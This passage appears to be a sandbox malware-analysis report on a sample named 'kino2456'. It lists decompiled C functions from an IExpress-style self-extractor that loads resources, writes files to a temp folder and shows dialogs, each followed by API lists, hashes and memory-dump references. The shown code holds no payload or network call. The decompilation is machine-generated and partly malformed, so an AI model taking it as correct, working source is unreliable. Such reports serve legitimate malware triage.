                                                                                                                                                                                                                                    0x00962912
                                                                                                                                                                                                                                    0x00962a65
                                                                                                                                                                                                                                    0x00962a68
                                                                                                                                                                                                                                    0x00962a6c
                                                                                                                                                                                                                                    0x00962a6f
                                                                                                                                                                                                                                    0x00962a6f
                                                                                                                                                                                                                                    0x00962a7d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00962A6F
                                                                                                                                                                                                                                      • Part of subcall function 00962773: CharUpperA.USER32(F4CC89A0,00000000,00000000,00000000), ref: 009627A8
                                                                                                                                                                                                                                      • Part of subcall function 00962773: CharNextA.USER32(0000054D), ref: 009627B5
                                                                                                                                                                                                                                      • Part of subcall function 00962773: CharNextA.USER32(00000000), ref: 009627BC
                                                                                                                                                                                                                                      • Part of subcall function 00962773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00962829
                                                                                                                                                                                                                                      • Part of subcall function 00962773: RegQueryValueExA.ADVAPI32(?,00961140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00962852
                                                                                                                                                                                                                                      • Part of subcall function 00962773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00962870
                                                                                                                                                                                                                                      • Part of subcall function 00962773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 009628A0
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00963938,?,?,?,?,-00000005), ref: 00962958
                                                                                                                                                                                                                                    • GlobalLock.KERNEL32 ref: 00962969
                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00963938,?,?,?,?,-00000005,?), ref: 00962A21
                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00962A81
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3949799724-0
                                                                                                                                                                                                                                    • Opcode ID: 6cd39b18dc2f22725d229fd43636a9c59f92f689442432eaf4e3c248eb83a47e
                                                                                                                                                                                                                                    • Instruction ID: 4aad5aba81047a19ff83b65dcf081cd6bbf5f4dec634accd5485a300f7176286
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cd39b18dc2f22725d229fd43636a9c59f92f689442432eaf4e3c248eb83a47e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC512831E00619EBCB21CF98C984AAEBBB9FF48700F14402AE915E3291DBB59941DF90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00964169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                                    			E00964169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0096468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0096468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E009644B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E009644B9(0, 0x4b5, 0, 0, 0x10, 0);
			}





                                                                                                                                                                                                                                    0x0096417d
                                                                                                                                                                                                                                    0x0096418f
                                                                                                                                                                                                                                    0x00964193
                                                                                                                                                                                                                                    0x009641b7
                                                                                                                                                                                                                                    0x009641d3
                                                                                                                                                                                                                                    0x009641e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009641e7
                                                                                                                                                                                                                                    0x009641d5
                                                                                                                                                                                                                                    0x009641d6
                                                                                                                                                                                                                                    0x009641d8
                                                                                                                                                                                                                                    0x009641d9
                                                                                                                                                                                                                                    0x009641da
                                                                                                                                                                                                                                    0x009641df
                                                                                                                                                                                                                                    0x009641e1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009641e1
                                                                                                                                                                                                                                    0x009641b9
                                                                                                                                                                                                                                    0x009641ba
                                                                                                                                                                                                                                    0x009641bc
                                                                                                                                                                                                                                    0x009641bd
                                                                                                                                                                                                                                    0x009641be
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009641be
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: memcpy_s.MSVCRT ref: 009646E5
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,009630B4), ref: 00964189
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,009630B4), ref: 009641E7
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                    • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                    • Opcode ID: bfbb7c0fa485b3fffca26bf46b2eb8785481d3942e9ddcb47abbd212f2f49606
                                                                                                                                                                                                                                    • Instruction ID: 0cac4f89ec09e4087fc9bb3394f322e1ceae1ce115668e54bbb00311b011db91
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfbb7c0fa485b3fffca26bf46b2eb8785481d3942e9ddcb47abbd212f2f49606
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B001F4F13082147FF32426A58C86F7B218EDBE67D9F06403AB706E1290DEA8CC015175
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009619E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E009619E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x968004; // 0xf4cc89a0
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E009643D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x969a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00966CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}













                                                                                                                                                                                                                                    0x009619e0
                                                                                                                                                                                                                                    0x009619e0
                                                                                                                                                                                                                                    0x009619eb
                                                                                                                                                                                                                                    0x009619f2
                                                                                                                                                                                                                                    0x009619f9
                                                                                                                                                                                                                                    0x009619fc
                                                                                                                                                                                                                                    0x00961a01
                                                                                                                                                                                                                                    0x00961a2a
                                                                                                                                                                                                                                    0x00961a2e
                                                                                                                                                                                                                                    0x00961a3e
                                                                                                                                                                                                                                    0x00961a4f
                                                                                                                                                                                                                                    0x00961a62
                                                                                                                                                                                                                                    0x00961a6a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961a03
                                                                                                                                                                                                                                    0x00961a06
                                                                                                                                                                                                                                    0x00961a20
                                                                                                                                                                                                                                    0x00961a20
                                                                                                                                                                                                                                    0x00961a08
                                                                                                                                                                                                                                    0x00961a08
                                                                                                                                                                                                                                    0x00961a14
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961a16
                                                                                                                                                                                                                                    0x00961a18
                                                                                                                                                                                                                                    0x00961a70
                                                                                                                                                                                                                                    0x00961a72
                                                                                                                                                                                                                                    0x00961a72
                                                                                                                                                                                                                                    0x00961a14
                                                                                                                                                                                                                                    0x00961a06
                                                                                                                                                                                                                                    0x00961a81

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00961A18
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00961A24
                                                                                                                                                                                                                                    • LoadStringA.USER32(?,?,00000200), ref: 00961A4F
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00961A62
                                                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 00961A6A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1273765764-0
                                                                                                                                                                                                                                    • Opcode ID: c6bd8298a3e6610721568355a0197d7941ad167c088f589d86ec73c0c21b7b65
                                                                                                                                                                                                                                    • Instruction ID: fcb32751d1c91c9d5a75bc3aab115ca559a9c62ac1ba19348b536a87403e6b2a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6bd8298a3e6610721568355a0197d7941ad167c088f589d86ec73c0c21b7b65
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9211A131519119AFDB10EFA4DE08AAE77B8FF4A300F148158F912E2190DE74AE01EB95
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00967155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00967155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x968004; // 0xf4cc89a0
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x968004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x968004 = _t39;
				}
				_t37 =  !_t36;
				 *0x968008 = _t37;
				return _t37;
			}











                                                                                                                                                                                                                                    0x0096715d
                                                                                                                                                                                                                                    0x00967161
                                                                                                                                                                                                                                    0x00967165
                                                                                                                                                                                                                                    0x00967178
                                                                                                                                                                                                                                    0x00967182
                                                                                                                                                                                                                                    0x0096718e
                                                                                                                                                                                                                                    0x00967197
                                                                                                                                                                                                                                    0x009671a0
                                                                                                                                                                                                                                    0x009671b1
                                                                                                                                                                                                                                    0x009671b8
                                                                                                                                                                                                                                    0x009671c4
                                                                                                                                                                                                                                    0x009671c7
                                                                                                                                                                                                                                    0x009671cb
                                                                                                                                                                                                                                    0x009671d5
                                                                                                                                                                                                                                    0x009671da
                                                                                                                                                                                                                                    0x009671da
                                                                                                                                                                                                                                    0x009671dc
                                                                                                                                                                                                                                    0x009671dc
                                                                                                                                                                                                                                    0x009671e2
                                                                                                                                                                                                                                    0x009671e5
                                                                                                                                                                                                                                    0x009671ee

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00967182
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00967191
                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0096719A
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 009671A3
                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 009671B8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                                                                    • Opcode ID: c6f1f53d36ba8bd18b85c16c1201dc93f44ca6ce3fc3773a807b4b9fa2b80d8b
                                                                                                                                                                                                                                    • Instruction ID: 3eef13b636901c1da9f82f88ce48d61797c7ce5ffd64658bf7d542487794d783
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6f1f53d36ba8bd18b85c16c1201dc93f44ca6ce3fc3773a807b4b9fa2b80d8b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70111C71D29208EFCB10DFF8DA48A9EB7F8EF59315F62495AD805E7210EA709A049F41
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009663C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                    			E009663C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x968004; // 0xf4cc89a0
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00961781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
				E0096658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x969124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x969124 = 0x80070052;
					_t37 = 0;
				}
				return E00966CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}















                                                                                                                                                                                                                                    0x009663cb
                                                                                                                                                                                                                                    0x009663d2
                                                                                                                                                                                                                                    0x009663d8
                                                                                                                                                                                                                                    0x009663ea
                                                                                                                                                                                                                                    0x009663f3
                                                                                                                                                                                                                                    0x00966401
                                                                                                                                                                                                                                    0x00966402
                                                                                                                                                                                                                                    0x00966410
                                                                                                                                                                                                                                    0x00966415
                                                                                                                                                                                                                                    0x00966433
                                                                                                                                                                                                                                    0x00966438
                                                                                                                                                                                                                                    0x00966449
                                                                                                                                                                                                                                    0x00966463
                                                                                                                                                                                                                                    0x0096646d
                                                                                                                                                                                                                                    0x00966477
                                                                                                                                                                                                                                    0x00966477
                                                                                                                                                                                                                                    0x0096647a
                                                                                                                                                                                                                                    0x0096643a
                                                                                                                                                                                                                                    0x0096643a
                                                                                                                                                                                                                                    0x00966444
                                                                                                                                                                                                                                    0x00966444
                                                                                                                                                                                                                                    0x00966492

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0096642D
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0096645B
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0096647A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 009663EB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                    • API String ID: 1065093856-3290032183
                                                                                                                                                                                                                                    • Opcode ID: 0a7ce9254402b5165fff5e9e7fcab0faea0a37add65dfd5f23cc27bf15f6ecde
                                                                                                                                                                                                                                    • Instruction ID: a465c9b8d0ae0f1c697d33ded9f37d676921d2a98a8892dc9c6267d01752fdae
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a7ce9254402b5165fff5e9e7fcab0faea0a37add65dfd5f23cc27bf15f6ecde
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1821D271A04218ABDB20DF25DC85FEB777CEB85314F1041A9F585A3290DEB46D849FA4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009647E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E009647E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00961680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x9691e0; // 0x31a8e18
						 *(_t34 + 4) = _t11;
						 *0x9691e0 = _t34;
						return 1;
					}
					_t25 =  *0x968584; // 0x0
					E009644B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x968584; // 0x0
				E009644B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}















                                                                                                                                                                                                                                    0x009647e8
                                                                                                                                                                                                                                    0x009647f0
                                                                                                                                                                                                                                    0x009647f4
                                                                                                                                                                                                                                    0x0096480f
                                                                                                                                                                                                                                    0x00964811
                                                                                                                                                                                                                                    0x00964814
                                                                                                                                                                                                                                    0x00964814
                                                                                                                                                                                                                                    0x00964816
                                                                                                                                                                                                                                    0x00964817
                                                                                                                                                                                                                                    0x00964829
                                                                                                                                                                                                                                    0x0096482b
                                                                                                                                                                                                                                    0x0096482f
                                                                                                                                                                                                                                    0x0096484f
                                                                                                                                                                                                                                    0x00964852
                                                                                                                                                                                                                                    0x00964855
                                                                                                                                                                                                                                    0x00964855
                                                                                                                                                                                                                                    0x00964857
                                                                                                                                                                                                                                    0x00964858
                                                                                                                                                                                                                                    0x00964860
                                                                                                                                                                                                                                    0x00964865
                                                                                                                                                                                                                                    0x0096486a
                                                                                                                                                                                                                                    0x0096486f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964876
                                                                                                                                                                                                                                    0x00964831
                                                                                                                                                                                                                                    0x00964841
                                                                                                                                                                                                                                    0x00964847
                                                                                                                                                                                                                                    0x0096480b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096480b
                                                                                                                                                                                                                                    0x009647f6
                                                                                                                                                                                                                                    0x00964806
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00964E6F), ref: 009647EA
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00964823
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00964847
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00964851
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                    • API String ID: 359063898-3290032183
                                                                                                                                                                                                                                    • Opcode ID: 8e6af130204eb8339861a8f7a8d131f018a73a9e76212f4ba09e2ea316620f2f
                                                                                                                                                                                                                                    • Instruction ID: 867643a8e36e689f23e569633377b9bd4d2c830e27223d603f788f3739fc44a7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e6af130204eb8339861a8f7a8d131f018a73a9e76212f4ba09e2ea316620f2f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C1125B9208641AFD7249F649C18F773B9EEBC6340B14851DFA82DB341DE768C069760
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00963680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00963680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
